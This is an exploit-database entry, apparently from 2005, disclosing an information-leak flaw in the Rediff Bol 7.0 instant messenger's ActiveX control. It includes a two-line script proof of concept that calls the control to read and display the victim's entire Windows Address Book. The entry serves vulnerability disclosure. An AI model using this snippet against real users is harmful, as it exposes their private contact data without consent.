Rediff Bol 7.0 Instant Messenger - ActiveX Control Information Disclosure

EDB-ID:

26221

CVE:

N/A




Platform:

Windows

Date:

2005-09-05


source: https://www.securityfocus.com/bid/14740/info

Rediff Bol Instant Messenger is prone to an information disclosure vulnerability. A malicious ActiveX control could allow an attacker to obtain the contents of a vulnerable user's Windows Address Book. 

[script]
var Obj = new ActiveXObject("Fetch.FetchContact.1");
alert(Obj.FullAddressBook(0,"","",""));
[/script]